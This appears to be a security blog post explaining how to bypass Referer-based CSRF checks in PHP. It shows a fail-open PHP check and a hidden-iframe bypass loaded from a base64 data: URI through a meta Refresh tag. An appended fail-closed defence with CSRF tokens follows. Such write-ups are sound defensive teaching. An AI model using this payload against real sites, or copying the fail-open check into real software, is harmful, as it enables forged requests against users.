I have seen developers relying on the HTTP Referer header as a method of mitigating CSRF. One of the reasons is that it is proposed in the OWASP CSRF mitigation techniques, even though the article clearly says that trusting the Referer is not the right way to mitigate this issue.
https://www.owasp.org/index.php/Cros...Referer_Header. I have also seen the Origin header being used to detect CSRF.
Note: the HTTP Referer header is removed when a request is made from an HTTPS site to an HTTP one, and vice versa.
The following code checks whether the HTTP_REFERER header is present; if it is, it checks whether the current host equals the Referer host. If the two are not the same, it raises a CSRF alert. Why not mandate the HTTP_REFERER header? Because the first GET request would never carry a Referer.
So with the above I won't be able to directly iframe the page, since the frame request would carry the parent's Referer header.
PHP Code:
<?php
// Only checks when a Referer is present: a request without one is let through.
if (isset($_SERVER['HTTP_REFERER'], $_SERVER['HTTP_HOST'])) {
    // Note: HTTP_HOST may carry a port, while PHP_URL_HOST never does.
    if (parse_url($_SERVER['HTTP_REFERER'], PHP_URL_HOST) != $_SERVER['HTTP_HOST']) {
        exit('Anti-CSRF mechanism!');
    }
}
But this CSRF protection can be easily bypassed. The attacker only has to use any technique that lets him send a request without a Referer header.
All we need to do is load the iframe from a data: URI. Now the iframe has no parent document, so no Referer header is added.
<!DOCTYPE html>
<html>
<body>
<iframe src="https://target-server.com" style="display:none;">
</iframe>
</body>
</html>
Base64-encode it and load it inside an http-equiv="Refresh" meta tag.
data:text/html;charset=utf-8;base64,PCFET0NUWVBFIGh0bWw+DQo8aHRtbD4NCjxib2R5Pg0KPGlmcmFtZSBzcmM9Imh0dHBzOi8vdGFyZ2V0LXNlcnZlci5jb20iIHN0eWxlPSJkaXNwbGF5Om5vbmU7Ij4NCjwvaWZyYW1lPg0KPC9ib2R5Pg0KPC9odG1sPg==
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Refresh" content="2;url=data:text/html;charset=utf-8;base64,PCFET0NUWVBFIGh0bWw+DQo8aHRtbD4NCjxib2R5Pg0KPGlmcmFtZSBzcmM9Imh0dHBzOi8vdGFyZ2V0LXNlcnZlci5jb20iIHN0eWxlPSJkaXNwbGF5Om5vbmU7Ij4NCjwvaWZyYW1lPg0KPC9ib2R5Pg0KPC9odG1sPg==">
</head>
<body>
</body>
</html>
And we would successfully bypass Referer- and Origin-based CSRF protections.
Regards,
Rahul Sasi
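The weak point in the check above is that it fails open: a request with no Referer at all is simply let through, which is exactly what the data: URI iframe produces. The following is an added example, not code from the original post, showing the defensive counterpart: a fail-closed Origin/Referer comparison for state-changing requests, with a synchronizer token as the primary defence. Function names, the normalisation helper and the constructed sample requests are my own assumptions for illustration.

```php
<?php
// Added example (not from the original post): fail-closed same-origin check
// plus a synchronizer token. Function names and the sample $_SERVER arrays
// below are assumptions for illustration, not real traffic.

declare(strict_types=1);

// Methods that must never change state; they pass without a check.
const SAFE_METHODS = ['GET', 'HEAD', 'OPTIONS'];

/**
 * Return "host:port" for a URL or a bare Host header value, filling in the
 * default port, so that "https://app.example:443" and "app.example" compare equal.
 */
function normalizeHost(string $urlOrHost, string $scheme): ?string
{
    // A bare Host header has no scheme; prefix one so parse_url() can split it.
    $url = preg_match('#^https?://#i', $urlOrHost) ? $urlOrHost : $scheme . '://' . $urlOrHost;
    $parts = parse_url($url);
    if ($parts === false || empty($parts['host'])) {
        return null;
    }
    $effectiveScheme = strtolower($parts['scheme'] ?? $scheme);
    $port = $parts['port'] ?? ($effectiveScheme === 'https' ? 443 : 80);
    return strtolower($parts['host']) . ':' . $port;
}

/**
 * Fail-closed check: a state-changing request must carry an Origin or Referer
 * header that matches our own host. A request with neither header (the data:
 * URI iframe case) or with the opaque origin "null" is rejected, not waved through.
 */
function isSameOriginRequest(array $server): bool
{
    $method = strtoupper($server['REQUEST_METHOD'] ?? 'GET');
    if (in_array($method, SAFE_METHODS, true)) {
        return true;
    }
    $scheme = (!empty($server['HTTPS']) && $server['HTTPS'] !== 'off') ? 'https' : 'http';
    $self = normalizeHost($server['HTTP_HOST'] ?? '', $scheme);
    if ($self === null) {
        return false;
    }
    // Prefer Origin (sent on cross-site POSTs by modern browsers), then Referer.
    $source = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? null;
    if ($source === null || $source === 'null') {
        return false;
    }
    return normalizeHost($source, $scheme) === $self;
}

/**
 * Synchronizer token: the primary defence. Stored in the session, echoed in a
 * hidden form field, compared in constant time.
 */
function issueCsrfToken(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

function verifyCsrfToken(array $session, ?string $submitted): bool
{
    return is_string($submitted)
        && !empty($session['csrf_token'])
        && hash_equals($session['csrf_token'], $submitted);
}

// Constructed sample requests for a quick self-check.
$session = [];
$token = issueCsrfToken($session);
$samples = [
    'referer-less POST (data: iframe)' => ['REQUEST_METHOD' => 'POST', 'HTTP_HOST' => 'target-server.com', 'HTTPS' => 'on'],
    'cross-site POST with Origin'      => ['REQUEST_METHOD' => 'POST', 'HTTP_HOST' => 'target-server.com', 'HTTPS' => 'on', 'HTTP_ORIGIN' => 'https://evil.example'],
    'legitimate POST with token'       => ['REQUEST_METHOD' => 'POST', 'HTTP_HOST' => 'target-server.com:443', 'HTTPS' => 'on', 'HTTP_ORIGIN' => 'https://target-server.com', 'POST_TOKEN' => $token],
];
foreach ($samples as $label => $server) {
    $accepted = isSameOriginRequest($server) && verifyCsrfToken($session, $server['POST_TOKEN'] ?? null);
    printf("%-36s %s\n", $label, $accepted ? 'accepted' : 'rejected');
}
```

Only the last sample is accepted: the first is rejected because a POST without Origin or Referer is treated as cross-site rather than trusted, and the second because the Origin host differs. The Host normalisation also closes the "target-server.com:443" versus "target-server.com" mismatch that a naive string comparison against HTTP_HOST would produce.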